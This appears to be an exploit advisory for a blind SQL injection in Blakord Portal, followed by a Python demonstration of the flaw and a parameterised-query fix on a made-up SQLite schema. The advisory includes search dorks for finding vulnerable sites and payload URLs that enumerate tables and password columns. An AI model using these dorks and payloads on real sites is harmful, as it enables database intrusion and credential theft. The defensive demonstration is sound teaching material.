Blakord Portal <= Beta 1.3.A (all modules) Blind Sql Injection

2007.12.28
Credit: JosS
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[+] Info:

[~] Software: Blakord Portal
[~] HomePage: http://www.cdv3k.com
[~] Exploit: Blind Sql Injection [High]
[~] Where: All Modules
[~] Bug Found By: JosS / Jose Luis Góngora Fernández
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Dork: "Power by Blakord Portal"
[~] Dork2: "Powered by Blakord Portal"
[~] Dork3: "Blakord Portal"

[+] Compression:

[~] True: http://localhost/[path]/[any module]?id=1 and 1=1
[~] False: http://localhost/[path]/[any module]?id=1 and 1=2

[+] Exploding:

[*] Checking table:

[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) >= 0
[~] Exploit2: http://localhost/[path]/[any module]?id=1 and exists (select * from [TABLE])
[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) >= 0
[~] Example2: http://localhost/[path]/[any module]?id=1 and exists (select * from users)
[~] If you don't see any error, the table exists.

[*] Checking columns number of table:

[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) = [NUMBER]
[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) = 6
[~] If you don't see any error, the table has 6 columns.

[*] Checking columns of table:

[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count([COLUMN]) FROM [TABLE]) >= 0
[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(U_PASSWORD) FROM users) >= 0
[~] If you don't see any error, the column exists.

[*] Admin Password; Noob or Lammer?:

[~] Exploit: Priv8
[~] Example: Priv8
[~] Priv8 , xD.

[+] [The End]
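The true/false and error/no-error checks above work because the `id` value reaches the SQL engine as query text. The following added example (not from the advisory or from Blakord Portal's code) reproduces that behaviour on a constructed in-memory SQLite schema and shows the same inputs being rejected once `id` is validated and bound as a parameter. Assumptions: the `articles` table, the query shape and all function names are hypothetical; only `users` and `U_PASSWORD` appear in the advisory.

```python
import sqlite3

def make_db():
    """Constructed schema; only `users` and `U_PASSWORD` are names from the advisory."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users (U_NAME TEXT, U_PASSWORD TEXT);
        INSERT INTO articles VALUES (1, 'Welcome');
        INSERT INTO users VALUES ('admin', 'constructed-value');
    """)
    return db

def fetch_vulnerable(db, raw_id):
    # Assumed flaw: the request parameter is concatenated into the SQL text.
    return db.execute("SELECT title FROM articles WHERE id = " + raw_id).fetchall()

def fetch_hardened(db, raw_id):
    # Accept only a short run of ASCII digits, then bind it as a parameter.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("id must be a positive integer")
    return db.execute("SELECT title FROM articles WHERE id = ?",
                      (int(raw_id),)).fetchall()

def observe(fetch, raw_id):
    """What a client can tell apart: 'row', 'empty', 'error' or 'rejected'."""
    db = make_db()
    try:
        return "row" if fetch(db, raw_id) else "empty"
    except sqlite3.Error:
        return "error"      # SQL reached the engine and failed (unknown table)
    except ValueError:
        return "rejected"   # input never reached the SQL engine

# id values taken from the advisory's URLs, plus one constructed unknown table name
PROBES = ["1", "1 and 1=1", "1 and 1=2",
          "1 AND (SELECT Count(*) FROM users) >= 0",
          "1 and exists (select * from users)",
          "1 and exists (select * from no_such_table)"]

if __name__ == "__main__":
    for p in PROBES:
        print(f"{p!r:48} vulnerable={observe(fetch_vulnerable, p):8} "
              f"hardened={observe(fetch_hardened, p)}")
```

In the vulnerable path the three distinguishable outcomes (row, empty page, SQL error) are exactly the signals the advisory relies on; in the hardened path every non-numeric `id` produces the same rejection.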

